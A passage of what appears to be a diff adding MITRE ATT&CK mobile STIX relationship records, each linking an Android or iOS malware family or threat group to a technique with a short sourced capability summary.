"type": "relationship", + "id": "relationship--d76d838b-bbc7-459a-884a-2da8c36a2ba2", + "created": "2022-04-08T16:29:55.322Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-08T16:29:55.322Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b332a960-3c04-495a-827f-f17a5daed3a6", + "target_ref": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--82555171-8b78-40f3-84d9-058359ae808a", + "type": "relationship", + "created": "2020-09-24T15:34:51.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.244Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can send and block SMS messages.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b641e5b8-5981-452a-99f0-3598c783e5ee", + "created": "2019-08-07T15:57:13.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:30:47.506Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can intercept incoming SMS messages.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8d72c224-0cf5-4b9b-a98a-76ee3a406803", + "created": "2023-02-06T19:05:00.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:20:37.796Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can obtain a list of installed applications.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a46c3b05-07d5-461c-b1b1-4a81912b79f8", + "created": "2023-02-06T18:59:15.881Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:21:10.915Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can collect device information such as manufacturer, model, version, serial number, and telephone number.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--69718f1d-7761-41ae-b9d0-12c45f6b4ac4", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:33:51.882Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) modifies the system partition to maintain persistence.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b7c8abf7-d4e4-40a4-aa2a-ee995a6f4f10", + "created": "2023-03-03T15:36:15.840Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T15:36:15.840Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can access device call logs.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e08820f-a81d-480e-9e60-f14db3e49080", + "type": "relationship", + "created": "2019-09-04T14:28:15.909Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.568Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can take photos and videos.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cce5d90f-edff-454d-bafa-caf33b71ed6c", + "type": "relationship", + "created": "2019-12-10T16:07:41.078Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2019-12-10T16:07:41.078Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) attempts to gain root access by using local exploits.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0993769f-63fb-4720-bbcf-e6f37f71515e", + "type": "relationship", + "created": "2020-06-02T14:32:31.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.875Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device’s name, serial number, iOS version, total disk space, and free disk space.(Citation: Google Project Zero Insomnia) ", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d3e6bc20-1f9c-41b6-89f0-ef95689add86", + "created": "2023-03-20T15:16:43.275Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:16:43.275Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a04dfb58-b7d3-4abe-9f4a-fad4f7158965", + "type": "relationship", + "created": "2020-04-08T15:51:25.106Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:51:25.106Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can obtain a list of installed applications.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--20376a7f-897a-4f5d-a87a-93e64200a5a6", + "type": "relationship", + "created": "2020-07-20T13:27:33.553Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.518Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) sends the device’s IMEI with each exfiltration request.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ede5c314-5988-4151-bb30-b6a6983d02c0", + "created": "2020-12-31T18:25:05.164Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has been distributed as updates to legitimate applications. This was accomplished by compromising legitimate app developers, and subsequently gaining access to their Google Play Store developer account.(Citation: CYBERWARCON CHEMISTGAMES)", + "modified": "2022-04-15T15:16:53.317Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1822e616-ae33-487c-8aa6-4fa81e724184", + "created": "2021-02-08T16:36:20.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:06:22.576Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included contact list exfiltration in the malicious apps deployed as part of Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f390ee16-a7c8-4ef2-b6f4-28940a8f0d81", + "created": "2023-03-20T15:45:44.000Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:45:44.000Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9dec6b2f-790a-4da9-86c9-1f4b7141c32c", + "type": "relationship", + "created": "2019-09-04T15:38:56.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + } + ], + "modified": "2019-10-14T18:08:28.500Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can communicate with the command and control server over ports 12512 and 12514.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d9aab2e1-31e0-45b2-a40b-0cbe60677b4b", + "created": "2020-11-24T18:18:33.772Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:43.120Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can request device administrator permissions.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4de3f794-63df-4f9e-8bd8-59796d91aa36", + "created": "2020-05-07T15:33:32.895Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) shows fraudulent ads to generate revenue.(Citation: CheckPoint Agent Smith)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22041a01-75e7-4ff6-8768-ad45188c53c7", + "created": "2023-02-28T21:45:25.064Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-01T22:03:00.755Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can obtain a list of installed applications.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42ae42eb-ea75-457a-bf39-4ea04304dd0b", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Gooligan Citation", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gooligan](https://attack.mitre.org/software/S0290) can install adware to generate revenue.(Citation: Gooligan Citation)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0bc73d69-e769-4d0f-9d44-368c94225b6e", + "created": "2020-07-15T20:20:59.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:50:39.124Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access the device’s contact list.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e9968b7-ad1e-440d-9fe3-2599a1571f39", + "created": "2020-06-26T14:55:13.387Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:59:55.854Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) communicates with the C2 using HTTP requests.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--545d9313-3fcc-4d4a-b9d2-7555430df8f2", + "created": "2019-09-04T14:28:15.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:28:58.447Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can reset the user's password/PIN.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3dd0cd4d-bcde-4105-b98e-b32add191083", + "created": "2020-01-27T17:05:58.331Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:39.589Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) exfiltrates data using HTTP POST requests.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25cdb4f2-5b38-411c-bfb6-eca7ea4d4527", + "created": "2019-09-04T14:28:16.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:57:56.616Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve nearby cell tower and Wi-Fi network information.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9607e4f-5743-4bbb-b7d4-5554d66c8be7", + "type": "relationship", + "created": "2019-08-07T15:57:13.388Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": 